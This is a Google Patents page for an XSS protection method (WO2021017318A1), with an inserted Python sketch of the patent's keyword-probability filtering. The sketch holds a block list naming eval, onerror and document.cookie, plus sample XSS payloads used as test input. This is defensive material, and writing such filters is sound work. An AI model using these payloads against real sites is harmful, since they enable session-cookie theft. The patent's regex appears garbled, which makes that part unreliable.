WO2021017318A1 - Cross-site scripting attack protection method and apparatus, device and storage medium - Google Patents


Info

Publication number
WO2021017318A1
Authority
WO
WIPO (PCT)
Prior art keywords
cross
site
access
script code
probability
Prior art date
Application number
PCT/CN2019/119113
Other languages
French (fr)
Chinese (zh)
Inventor
孙强
黄国华
Original Assignee
平安科技(深圳)有限公司
Application filed by 平安科技(深圳)有限公司
Publication of WO2021017318A1

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic

Definitions

  • This application relates to the field of network security technology, and in particular to a method, device, equipment, and computer-readable storage medium for preventing cross-site attacks.
  • An XSS attack refers to a malicious attacker inserting malicious script program code into a web page (Web).
  • the main purpose of this application is to provide a cross-site attack protection method, device, equipment, and computer-readable storage medium, aiming to solve the technical problem of low accuracy of the existing cross-site access defense.
  • the cross-site attack protection method includes the following steps:
  • the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access
  • according to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is a model obtained by analyzing currently known malicious attack programs;
  • if the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
  • the characters with attack capability in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense processing is performed on the cross-site access script code.
  • the step of detecting whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to a predefined lexical combination rule includes:
  • the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  • the step of screening characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code includes:
  • the access protection program is started to perform cross-site scripting defense processing on the access request.
  • the calculating the character probability that the character appears in the external network access request includes:
  • the probability of the character appearing in the external network access request is calculated.
  • the calculating the character probability that the character appears in the external network access request according to the number of appearances and the total number includes:
  • P is the probability of occurrence of characters with attack capability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • the probability level includes three levels of attack degree from low to high, and performing cross-site scripting defense processing on the cross-site access script code includes:
  • the cross-site access script code is deleted from the external network access request.
  • the performing cross-site scripting defense processing on the cross-site access script code further includes:
  • the security character is a symbol that only performs a code-digit filling function.
  • this application also provides a cross-site attack protection device, the cross-site attack protection device including:
  • the obtaining module is used to obtain the external network access request received by the network side, the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the detection module is configured to detect, according to the predefined lexical combination rule, whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, wherein the lexical combination rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code when a malicious program is detected, wherein the access identifier is defined based on a preset user rule;
  • a judging module for judging whether there are characters with attack capability in the cross-site access script code if the access identifier exists;
  • the defense processing module is configured to, if the character exists in the cross-site access script code, filter out the characters with attack capability in the cross-site access script code according to the access identifier, and perform cross-site scripting defense processing on the cross-site access script code.
  • the present application also provides a cross-site attack protection device.
  • the cross-site attack protection device includes a memory, a processor, and a cross-site attack protection program that is stored on the memory and can run on the processor, which, when executed by the processor, implements the steps of the cross-site attack protection method described in any one of the above.
  • the present application also provides a computer-readable storage medium that stores a cross-site attack protection program; when the cross-site attack protection program is executed by a processor, the steps of the cross-site attack protection method described in any one of the above are implemented.
  • This application performs cross-site attack protection processing on external network access requests, specifically by setting the access identifier in the request and detecting the lexical combination of the code. Marking based on this method not only improves the identification efficiency of the access script code but also improves the accuracy of recognition. For characters that carry a malicious attack, the external network access request is disabled by shielding, replacing, etc., so as to achieve cross-site attack defense, improve the security of the system and protect the data security of the website.
  • FIG. 1 is a schematic structural diagram of a base station operating environment involved in a solution according to an embodiment of the application;
  • FIG. 2 is a schematic flowchart of the first embodiment of the cross-site attack protection method according to this application;
  • FIG. 3 is a schematic flowchart of a second embodiment of the cross-site attack protection method according to this application.
  • Figure 4 is a schematic diagram of the functional modules of the cross-site attack protection device of this application.
  • This application provides a cross-site attack protection device.
  • FIG. 1 is a schematic structural diagram of the operating environment of the cross-site attack protection equipment involved in the solution of the embodiment of the application.
  • the cross-site attack protection device includes: a processor 101, such as a CPU, a communication bus 102, a user interface 103, a network interface 104, and a memory 105.
  • the communication bus 102 is used to implement connection and communication between these components.
  • the user interface 103 may include a display screen (Display) and an input unit such as a keyboard (Keyboard), and the network interface 104 may optionally include a standard wired interface and a wireless interface (such as a WI-FI interface).
  • the memory 105 may be a high-speed RAM memory, or a non-volatile memory (non-volatile memory), such as a magnetic disk memory.
  • the memory 105 may also be a storage device independent of the aforementioned processor 101.
  • the cross-site attack protection device shown in FIG. 1 does not constitute a limitation on the cross-site attack protection device in this application, which may include more or fewer components than shown in the figure, combine certain components, or use a different component arrangement.
  • the memory 105 as a computer-readable storage medium may include an operating system, a network communication module, a user interface module, and a cross-site attack-based protection program.
  • the operating system is a program that manages and controls cross-site attack protection equipment and software resources, and supports the operation of cross-site attack protection programs and other software and/or programs.
  • the network interface 104 is mainly used to access the network; the user interface 103 is mainly used to detect and confirm the user terminal’s code scanning operation instructions and payment input instructions, etc.
  • the processor 101 may be used to call a cross-site attack protection program stored in the memory 105, and perform operations in the following embodiments of the cross-site attack protection method.
  • the implementation of FIG. 1 may also be a mobile terminal, and the processor of the mobile terminal reads the program code stored in the buffer or the storage unit that implements the cross-site attack protection method for cross-site data access.
  • FIG. 2 is a flowchart of a cross-site attack protection method provided by an embodiment of this application.
  • the cross-site attack protection method specifically includes the following steps:
  • Step S210 Obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the external network access request refers to a request sent by a user on the side of a non-visited network, such as the relationship between an internal local area network and an Internet network in a certain company.
  • the external network access request is composed of script code; it may be a single script code that contains multiple data access methods, or it may be composed of multiple script codes, each corresponding to one type of data access.
  • the access script code in the extranet access request can be understood either as complete access code that is downloaded to the corresponding accessed terminal, or as trigger script code; that is to say, the actual access script code is stored on the accessed terminal and its execution is controlled by the trigger code in the request.
  • Step S220 According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is a model obtained through analysis of currently known malicious attack programs;
  • the specific principle of detecting whether there is a malicious webpage program is to first perform a cluster analysis of the cross-site access script code in the extranet access request: based on the access interface of the webpage, the lexical combination form of the access program is preliminarily determined and the program is classified into a family; the lexical combination rules are then analyzed over all access programs (that is, access code) in the same family to find which dangerous functions, system resources, suspicious tags, key classes and objects, etc. are called by all programs in the family; finally, lexical analysis and detection rules are defined according to the word order of these elements, and it is determined whether the access code is a malicious webpage program.
  • the detection method in this step can effectively prevent a single feature from being bypassed, which would otherwise lead to misjudgment of malicious programs.
  • Step S230 if there is a malicious program, detect whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
  • the user rule definition should be understood as an access rule customized for different web access methods and information storage methods, and an access identifier is set through the access rule.
  • after the web server or user terminal receives the access identifier, it can query and select an access mode matching the access identifier according to the predefined corresponding relationship, so as to achieve data access to the webpage.
  • the malicious webpage program detected in step S20 may be the result of a preliminary identification as malicious; the judgment of the marked access identifier in step S30 then makes the preliminary identification result accurate and avoids the phenomenon of misidentification as malicious.
  • Step S240 if the access identifier exists, determine whether there are characters with attack capability in the cross-site access script code;
  • the code settings for external network access requests are all public settings; the difference is that some verification parameters or encryption are added to the code, and since these security processing methods are basically the same, they are often cracked and malicious code is added to obtain user information.
  • the external network access request is encoded; the encoding process here converts the programmatic request, item by item, into access script code, where the converted access script code refers to the code source program.
  • the keywords are divided one by one, and the method of dividing the keywords is based on the data that can be accessed; that is to say, the divided keywords can each be separated as the smallest unit of the access.
  • each of the divided keywords is queried against the preset attack information database. If a keyword is found in the attack information database, the script code in the external network access request containing the found keyword is filtered out according to that keyword, and step S50 is executed for script defense processing.
  • the attack information database is established specifically from the malicious code keywords obtained in the server's usual tests, and is also formed by obtaining from the network the offensive keywords identified on the network. Of course, it can also be formed based on the user's source code development habit of choosing some infrequently used or relatively uncommon code words; when this type of code field is detected, special attention and judgment are required.
  • determining by the definition on the network means obtaining the general or special definition of the keyword to be detected from the network, and determining through that definition whether it can be used for attacking.
  • Some attack code programs or special-purpose code programs will be published, and access requests can also be made through these codes.
  • Step S250 If the character exists in the cross-site access script code, the characters with attack capability in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense processing is performed on the cross-site access script code.
  • the cross-site scripting defense processing mainly consists of shielding, deleting, or replacing the characters with attack capability or the entire cross-site access script code in which they are located; shielding refers to hiding the characters from the code by some special means, so as to weaken or even remove the attack capability of the code.
  • the specific processing method (shielding, deletion or replacement) needs to be selected according to the behaviour of the code. If the code has a special function definition, the deletion method cannot be used, since deletion usually causes the code to lose the ability to execute, whereas shielding and replacement can retain the original function of the code.
  • when the access identifier is set, it can be implemented in the following way: detect the user information carried in the external network access request, and determine whether the user information is user information that a preset user rule requires to be protected;
  • the access identifier is mainly used to define the access method, or it can be used for the definition of information security protection; through the setting of the access identifier, the protection of user information can be realized at the same time, and the special characters in the access can also be set.
  • in step S240, screening and selecting characters with attack capability in the access script code according to the access identifier can be implemented in the following way:
  • according to the access identifier and the corresponding relationship between the access identifier and the access rule, the access rule corresponding to the current access identifier is queried, where the access rule contains the special characters for realizing cross-site access and the cross-site access method;
  • the characters with attack capability in the access script code are filtered according to the special characters, so as to eliminate from the access script the characters that do not meet the requirements of the access rule, for subsequent cross-site scripting defense processing.
  • the specific implementation process for detecting, according to the predefined lexical combination rule, whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request can be as follows:
  • the active tag is a tag without other active tags between the active tag and the cross-site access script code, and the probability of the tag is the probability of the active tag directly appearing on the cross-site access script code.
  • the steps of screening out characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code include:
  • the access protection program is activated to perform cross-site scripting defense processing on the access request.
  • the keyword can also be used to calculate the probability of an attack, which is used to further determine whether processing is needed.
  • calculating the probability that the character appears in the external network access request includes:
  • the probability is calculated based on the number of occurrences and the total number.
  • the terminal or server generally generates an attack log in which all records of the terminal or server being attacked are stored, and a record can contain the keywords or the entire script code. Whether a character on the network side can be used for a data attack is calculated and judged by computing, from the historical records, the probability for the keywords preliminarily judged to be offensive. If the calculated probability is greater than the preset upper probability limit, the character is a high-risk code character, and step S240 is executed to defend against the XSS cross-site attack.
  • the calculating the probability according to the number of occurrences and the total number includes:
  • P is the probability of occurrence of characters with attack capability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • performing cross-site scripting defense processing on the cross-site access script code includes:
  • the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
  • the cross-site access script code is deleted from the external network access request.
  • the XSS attack information database contains 1, 2, and 3.
  • the descriptive characteristics of XSS attack information: if the extranet access request contains "<", then the "<" is replaced with a space according to the replacement definition of the feature; if the extranet access request contains ">", the ">" is replaced with a space according to the replacement definition of the feature; if the external network access request contains a content string conforming to the regular expression ⁇ s*script ⁇ sW.* ⁇ s*/ ⁇ s*script ⁇ s*>, it is replaced in a custom way with "com.pingan.xxxx" according to the replacement definition of the feature.
  • the malicious attack levels are distinguished according to the above three levels.
  • not all script codes can be directly deleted.
  • for script code with a higher level of malicious attack, it can be implemented in the following ways:
  • the detection of the script access function can be started to select a safer protection method to achieve it.
  • the implementation process is as follows:
  • the security character only realizes the code digit filling function symbol.
  • replacing the character with attack capability or the entire cross-site access script code in which it is located includes:
  • the keywords in the characters are replaced, or the keywords in the characters are converted into blank Chinese characters through Chinese character conversion rules, so that the characters lose the ability to attack.
  • Cross-site access is achieved through the method provided above, which realizes attack detection of malicious scripts in external network access requests and shields or replaces malicious code characters to disable their attack capability, ensuring the security of access and of information.
  • Step S310 the base station is receiving the cross-site access request sent by the user through the terminal;
  • the cross-site access request carries identification information pre-negotiated between the base station and the user terminal through a handshake protocol or an encrypted communication protocol, and the setting rule for the identification information may be a check value algorithm; that is, a check value is automatically generated based on the access script code constructed by the user, and the object of the check value calculation is the code of the script itself. When the code changes, the check value naturally changes, and this is reflected in the cross-site access request through the identification information.
  • Step S320 the base station recognizes the identification information of the cross-site access request
  • Step S330 Obtain lexical combination rules, and perform code phrase detection on the cross-site access script code in the cross-site access request;
  • the lexical combination rule is mainly to detect the combination between the function in the script code and the applet, and if it is modified, the function or applet in the script code must be changed.
  • the lexical combination rule is equivalent to secondary malicious detection, thus ensuring the accuracy of malicious attack detection.
  • Step S340 extracting attack characters in the cross-site access script code
  • the above attack character can be understood as a code function or a small program, or some code bytes, etc.
  • if attack characters are extracted, step S350 is executed; otherwise, step S360 is executed.
  • Step S350 calculating the attack level of the attacking character
  • Step S360 evaluating the function level of the cross-site access script code
  • Step S370 Perform protection processing on the cross-site access script code.
  • the calculation of the attack level can be specifically calculated by calculating the probability of the character, specifically:
  • P is the probability of occurrence of characters with attack ability
  • m is the number of occurrences
  • M is the total number of cross-site access script codes
  • is the weight coefficient
  • the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
  • the cross-site access script code is deleted from the external network access request.
  • the functional evaluation of the cross-site access script code is performed to determine whether the cross-site access script code is a necessary function access code in the external network access request;
  • the security character only realizes the code digit filling function symbol.
  • an embodiment of the present application also provides a cross-site attack protection device.
  • FIG. 4 is a schematic diagram of functional modules of the cross-site attack protection device provided by an embodiment of the application.
  • the device includes:
  • the obtaining module 41 is configured to obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
  • the detection module 42 is configured to detect, according to the predefined lexical combination rule, whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, wherein the lexical combination rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code, wherein the access identifier is defined based on a preset user rule;
  • the judging module 43 is configured to judge whether there are characters with attacking ability in the cross-site access script code if the access identifier exists;
  • the defense processing module 44 is configured to, if the character exists in the cross-site access script code, filter out characters with attack capability in the cross-site access script code according to the access identifier, and perform cross-site scripting defense processing on the cross-site access script code.
  • marking based on this method not only improves the identification efficiency of the access script code but also improves the accuracy of recognition, and for characters carrying malicious attacks the external network access request loses the ability to attack, so as to achieve cross-site attack defense, improve the security of the system and ensure the data security of the website.
  • the present application also provides a computer-readable storage medium, where the computer-readable storage medium may be volatile or non-volatile, which is not specifically limited by the present application.
  • a cross-site attack protection program is stored on the computer-readable storage medium, and when the cross-site attack protection program is executed by a processor it implements the steps of the cross-site attack protection method described in any of the above embodiments.
  • the method implemented when the cross-site attack protection program is executed by the processor can refer to the various embodiments of the cross-site attack protection method of the present application, so the details are not repeated here.
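As an added example (not code from the patent or its applicant), the following Python sketch implements the defender-side flow the page describes: divide the access script code into keywords, query them against an attack information database, compute the probability P from m, M and a weight coefficient, map P to the three probability levels, and apply replacement, shielding or deletion. The keyword database, the level boundaries, the formula P = weight * m / M (the page names the variables but its formula is not on this page), assigning replacement to the lowest level, HTML escaping as the shielding means, and the script-element regex are all assumptions.

```python
import html
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed attack information database: "characters with attack capability"
# (keywords) with a weight coefficient each. Assumed values for this example.
ATTACK_KEYWORDS = {
    "script": 1.0,
    "onerror": 0.9,
    "onload": 0.9,
    "javascript:": 1.0,
    "document.cookie": 1.0,
    "eval": 0.8,
}

# The page's three descriptive characteristics: "<" and ">" are replaced with
# a space, and a script element is replaced with the custom marker
# "com.pingan.xxxx". The regex is my reading of the page's garbled expression
# (an assumption).
SCRIPT_TAG_RE = re.compile(r"<\s*script\b.*?<\s*/\s*script\s*>", re.I | re.S)
REPLACEMENT_MARKER = "com.pingan.xxxx"

# Assumed boundaries of the three probability levels (the page gives no values).
LEVEL_1 = 0.2   # 0 < P <= LEVEL_1: lowest level, replace offending characters
LEVEL_2 = 0.6   # LEVEL_1 < P < LEVEL_2: middle level, shield the code
                # P >= LEVEL_2: highest level, delete the script code

# Keyword division: identifiers, allowing "." and ":" so that tokens such as
# "document.cookie" and "javascript:" survive as single keywords.
TOKEN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.:]*")


@dataclass
class Decision:
    probability: float
    level: str              # "none", "replace", "shield" or "delete"
    output: Optional[str]   # None when the script code is removed from the request


def split_keywords(script_code: str) -> List[str]:
    """Divide the access script code into keywords (the division of step S240)."""
    return TOKEN_RE.findall(script_code)


def attack_probability(script_code: str) -> float:
    """P from m (occurrences of attack keywords), M (total number of keywords)
    and the weight coefficient. P = weight * m / M, clipped to [0, 1], is an
    assumed formula; the page names the variables but the formula is absent."""
    keywords = split_keywords(script_code)
    total = len(keywords)                      # M
    if total == 0:
        return 0.0
    hits = [k for k in keywords if k.lower() in ATTACK_KEYWORDS]
    occurrences = len(hits)                    # m
    weight = max((ATTACK_KEYWORDS[k.lower()] for k in hits), default=0.0)
    return min(1.0, weight * occurrences / total)


def defend(script_code: str) -> Decision:
    """Apply the three-level defense processing to one cross-site access script code."""
    p = attack_probability(script_code)
    if p == 0.0:
        # No characters with attack capability: nothing to defend against.
        return Decision(p, "none", script_code)
    if p >= LEVEL_2:
        # Highest level: the script code is deleted from the request.
        return Decision(p, "delete", None)
    if p > LEVEL_1:
        # Middle level: shielding, here by HTML-escaping the whole code so a
        # browser renders it as text instead of executing it (assumed means).
        return Decision(p, "shield", html.escape(script_code, quote=True))
    # Lowest level: replacement according to the three descriptive characteristics.
    replaced = SCRIPT_TAG_RE.sub(REPLACEMENT_MARKER, script_code)
    replaced = replaced.replace("<", " ").replace(">", " ")
    return Decision(p, "replace", replaced)


def defend_request(request: List[str]) -> List[str]:
    """An external network access request is a collection of script codes; return
    the collection after defense processing (deleted codes are dropped)."""
    processed = []
    for code in request:
        decision = defend(code)
        if decision.output is not None:
            processed.append(decision.output)
    return processed


if __name__ == "__main__":
    # Constructed sample request: one benign code and three suspicious ones.
    sample_request = [
        "var total = price * qty;",
        "<p>Hello name</p><script>track()</script> footer text here now",
        '<img src="x" onerror="eval(payload)">',
        "<script>eval(document.cookie)</script>",
    ]
    for code in sample_request:
        d = defend(code)
        print(f"P={d.probability:.2f} level={d.level:<7} -> {d.output!r}")
```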

Abstract

A cross-site scripting attack protection method and apparatus, a device, and a storage medium relate to the technical field of network security. The method comprises: detecting the code of an external network access request by means of a preset lexical combination rule; providing an access identifier in the external network access request to mark whether malicious attack characters exist in the code; and performing attack defense processing on an external network access request whose code does not satisfy the lexical combination rule and/or which carries the access identifier. Marking in this way not only improves the identification efficiency of the access script code but also improves the accuracy of identification, and if malicious attack characters are present, the attack carried by the external network access request is disabled by shielding, replacing, etc., so as to achieve cross-site scripting attack defense, thereby improving the security of the system and ensuring the data security of websites.

Description

Cross-site attack protection method, device, equipment and storage medium
This application claims priority to the Chinese patent application filed with the Chinese Patent Office on August 1, 2019, with application number 201910706703.9 and the invention title "Cross-site attack protection method, device, equipment and storage medium", the entire content of which is incorporated herein by reference.
Technical field
This application relates to the field of network security technology, and in particular to a cross-site attack protection method, device, equipment and computer-readable storage medium.
Background
With the continuous development of network technology, the network has become part of people's daily life: all kinds of services are now delivered over the network, and as it develops further it will become an important platform and carrier for future intelligent systems. To improve the user experience, scripting languages are used extensively in network applications. As network design code is used ever more openly, script code has been tampered with to form cross-site scripting (Cross Site Script, XSS) attacks, which have become one of the most serious security problems on today's Internet.
An XSS attack refers to a malicious attacker inserting malicious script program code into a web page. The inventors found that when a user browses the page, the malicious script code embedded in the web page is executed, which attacks the user and leads to problems such as leakage of user privacy, infection of the client computer with viruses, control of enterprise data, theft of important enterprise data with commercial value, illegal transfers, forced sending of e-mail, planting trojans on websites, and control of the victim's machine to send attacks to other websites.
Summary of the invention
The main purpose of this application is to provide a cross-site attack protection method, device, equipment and computer-readable storage medium, aiming to solve the technical problem that existing cross-site access defenses have low accuracy.
To achieve the above objective, this application provides a cross-site attack protection method, which includes the following steps:
acquiring an external network access request received by the network side, where the external network access request is a set containing at least one cross-site access script code for implementing cross-site data access;
detecting, according to a predefined lexical combination rule, whether a malicious program exists in the HTTP data packet used to respond to cross-site access within the cross-site access script code carried in the external network access request, where the lexical combination rule is a model obtained by analyzing currently known malicious attack programs;
if a malicious program is detected, detecting whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on a preset user rule;
if the access identifier exists, determining whether characters with attack capability exist in the cross-site access script code;
if such characters exist in the cross-site access script code, screening out the characters with attack capability in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code.
Optionally, the step of detecting, according to the predefined lexical combination rule, whether a malicious program exists in the HTTP data packet used to respond to cross-site access within the cross-site access script code carried in the external network access request includes:
executing the cross-site access script code in a simulated run, and capturing the active tags on each accessed page of the HTTP data packet during the run;
calculating the reciprocal of the tag probability of each active tag in the cross-site access script code, summing the reciprocals and taking their arithmetic mean as the embedded-JavaScript reasonableness index of the active tags;
classifying the cross-site access script code according to the reasonableness index;
where an active tag is a tag between which and the cross-site access script code no other active tag exists, and the tag probability is the probability that the active tag appears directly on the cross-site access script code.
Optionally, the step of screening out the characters with attack capability in the cross-site access script code according to the access identifier and performing cross-site scripting defense processing on the cross-site access script code includes:
extracting the characters with attack capability from the cross-site access script code;
calculating the character probability that the character appears in the external network access request;
comparing the character probability with a preset probability level of information leakage;
if the character probability is greater than the probability level, starting an access protection program to perform cross-site scripting defense processing on the access request.
Optionally, calculating the character probability that the character appears in the external network access request includes:
retrieving all historical access records in which cross-site attacks occurred on the network side, and counting the total number of cross-site access script codes in all the historical access records;
counting the number of occurrences of the character in all the historical access records;
calculating, from the number of occurrences and the total number, the character probability that the character appears in the external network access request.
Optionally, calculating the character probability that the character appears in the external network access request from the number of occurrences and the total number includes:
dividing the number of occurrences by the total number to obtain a percentage value;
multiplying the percentage value by a weight coefficient to obtain the final character probability, calculated as follows:
$$P = \alpha \cdot \frac{m}{M}$$
where P is the probability of occurrence of the character with attack capability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
Optionally, the probability level includes three levels of attack severity from low to high, and performing cross-site scripting defense processing on the cross-site access script code includes:
if the character probability is greater than the first probability level and less than the second probability level, shielding the corresponding character, or the entire code, in the cross-site access script code;
if the character probability is greater than the second probability level and less than the third probability level, replacing the character, or the entire code, in the cross-site access script code;
if the character probability is greater than the third probability level, deleting the cross-site access script code from the external network access request.
Optionally, performing cross-site scripting defense processing on the cross-site access script code further includes:
when the character probability is greater than the third probability level, performing a functional evaluation of the cross-site access script code to determine whether the cross-site access script code is a necessary function access code in the external network access request;
if so, retaining the cross-site access script code in the external network access request and replacing the character with attack capability with a preset safe character, the safe character being a symbol that only serves to pad the length of the code.
In addition, to achieve the above objective, this application also provides a cross-site attack protection device, which includes:
an acquisition module, configured to acquire an external network access request received by the network side, where the external network access request is a set containing at least one cross-site access script code for implementing cross-site data access;
a detection module, configured to detect, according to a predefined lexical combination rule, whether a malicious program exists in the HTTP data packet used to respond to cross-site access within the cross-site access script code carried in the external network access request, where the lexical combination rule is a model obtained by analyzing currently known malicious attack programs; and configured to detect, when a malicious program is detected, whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on a preset user rule;
a judgment module, configured to determine, if the access identifier exists, whether characters with attack capability exist in the cross-site access script code;
a defense processing module, configured to, if such characters exist in the cross-site access script code, screen out the characters with attack capability in the cross-site access script code according to the access identifier, and perform cross-site scripting defense processing on the cross-site access script code.
In addition, to achieve the above objective, this application also provides cross-site attack protection equipment, which includes a memory, a processor, and a cross-site attack protection program stored in the memory and runnable on the processor; when executed by the processor, the cross-site attack protection program implements the steps of the cross-site attack protection method described in any of the above.
In addition, to achieve the above objective, this application also provides a computer-readable storage medium storing a cross-site attack protection program; when executed by a processor, the cross-site attack protection program implements the steps of the cross-site attack protection method described in any of the above.
This application performs cross-site attack protection processing on external network access requests, specifically by setting an access identifier in the request and detecting the lexical combination of the code. Marking in this way not only improves the efficiency of identifying the access script code but also improves the accuracy of identification; where characters capable of a malicious attack are present, shielding, replacement and similar measures strip the external network access request of its attack capability, thereby achieving cross-site attack defense, improving the security of the system and safeguarding the data security of the website.
Description of the drawings
FIG. 1 is a schematic structural diagram of the base station operating environment involved in the solution of an embodiment of this application;
FIG. 2 is a schematic flowchart of a first embodiment of the cross-site attack protection method of this application;
FIG. 3 is a schematic flowchart of a second embodiment of the cross-site attack protection method of this application;
FIG. 4 is a schematic diagram of the functional modules of the cross-site attack protection device of this application.
The realization of the objectives, the functional features and the advantages of this application will be further described with reference to the embodiments and the accompanying drawings.
Detailed description of the embodiments
It should be understood that the specific embodiments described here are only used to explain this application and are not intended to limit it.
This application provides cross-site attack protection equipment.
Referring to FIG. 1, FIG. 1 is a schematic structural diagram of the operating environment of the cross-site attack protection equipment involved in the solution of an embodiment of this application.
As shown in FIG. 1, the cross-site attack protection equipment includes a processor 101, such as a CPU, a communication bus 102, a user interface 103, a network interface 104 and a memory 105. The communication bus 102 is used to implement connection and communication between these components. The user interface 103 may include a display (Display) and an input unit such as a keyboard (Keyboard); the network interface 104 may optionally include a standard wired interface and a wireless interface (such as a Wi-Fi interface). The memory 105 may be a high-speed RAM memory or a non-volatile memory, such as a magnetic disk memory. Optionally, the memory 105 may also be a storage device independent of the aforementioned processor 101.
Those skilled in the art will understand that the hardware structure of the cross-site attack protection equipment shown in FIG. 1 does not limit the cross-site attack protection equipment of this application; it may include more or fewer components than shown, combine certain components, or arrange the components differently.
As shown in FIG. 1, the memory 105, as a computer-readable storage medium, may include an operating system, a network communication module, a user interface module and a cross-site attack protection program. The operating system is a program that manages and controls the hardware and software resources of the cross-site attack protection equipment and supports the running of the cross-site attack protection program and other software and/or programs.
In the hardware structure of the cross-site attack protection equipment shown in FIG. 1, the network interface 104 is mainly used to access the network; the user interface 103 is mainly used to detect and confirm the code-scanning operation instructions and payment input instructions of the user terminal, etc.; and the processor 101 may be used to call the cross-site attack protection program stored in the memory 105 and to perform the operations of the following embodiments of the cross-site attack protection method.
In an embodiment of this application, the implementation of FIG. 1 may also be a mobile terminal, whose processor performs cross-site data access by reading program code, stored in a buffer or storage unit, that implements the cross-site attack protection method.
Based on the above hardware structure of the cross-site attack protection equipment, the embodiments of the cross-site attack protection method of this application are proposed.
Referring to FIG. 2, FIG. 2 is a flowchart of the cross-site attack protection method provided by an embodiment of this application. In this embodiment, the cross-site attack protection method specifically includes the following steps:
Step S210: acquiring an external network access request received by the network side, where the external network access request is a set containing at least one cross-site access script code for implementing cross-site data access;
In this step, the external network access request refers to a request sent by a user on a network side other than the one being accessed, for example the relationship between a company's internal local area network and the Internet. The external network access request consists of script code: it may be a single script code containing several data access methods, or it may consist of multiple script codes, each corresponding to one kind of data access. In practice, the access script code in the external network access request may be understood as a complete access code that is downloaded to the corresponding accessed terminal when access is required; or it may be a trigger script code, meaning that the actual access script code is stored on the accessed terminal and its execution is controlled by the trigger code in the request.
Step S220: detecting, according to a predefined lexical combination rule, whether a malicious program exists in the HTTP data packet used to respond to cross-site access within the cross-site access script code carried in the external network access request, where the lexical combination rule is a model obtained by analyzing currently known malicious attack programs;
In this step, the detection of whether a malicious web program exists works as follows. First, a cluster analysis is performed on the cross-site access script code in the external network access request: the web page access interfaces in the code are analyzed, the lexical combination form of the access program is preliminarily determined on the basis of those interfaces, and the program is classified into a family. Then the lexical combination rules are analyzed across all access programs (that is, access code) of the same family, to find out which dangerous functions, system resources, suspicious tags, key classes and objects, and so on, the programs of that family call. Finally, lexical analysis and detection rules are defined according to the word order of these elements, and it is determined whether the access code is a malicious web program. Compared with traditional IPS rules and WAF rules, the detection method of this step effectively avoids the problem that a single feature can be bypassed, which leads to misjudging malicious programs.
Step S230: if a malicious program exists, detecting whether an access identifier exists in the cross-site access script code, where the access identifier is defined based on a preset user rule;
In this step, the user rule definition should be understood as an access rule customized for the access methods and information storage methods of different web pages, and an access identifier is set through this access rule. When the web server or user terminal receives the access identifier, it can query and select, according to a predefined correspondence, the access method that matches the access identifier, and so access the data of the web page.
Furthermore, some web page settings require special access, for example using certain code or characters that the network defines as illegal access in order to achieve that special access; these codes or characters are nevertheless set by the system as trusted access terms, and in that case they can be set through the access identifier, thereby realizing the filtering of special codes or characters.
In this embodiment, the malicious web program detected in step S220 may be a preliminary finding of maliciousness, and the subsequent judgment of the access identifier marked in step S230 makes the preliminary finding precise and avoids misidentifying code as malicious.
Step S240: if the access identifier exists, determining whether characters with attack capability exist in the cross-site access script code;
In practice, because the code settings of external network access requests are all public, the only differences are some check parameters or encryption added to the code; these security measures are largely alike, so they are frequently cracked and malicious code is inserted to obtain user information. For this reason, in this step the external network access request is converted into code: the conversion turns the programmatic request into individual access script codes, and the converted access script code refers to the source program of the code.
Then the source program is decomposed and divided into individual keywords; the keywords are divided on the basis of being able to realize data access, that is, each divided keyword can on its own realize a separate small-byte access.
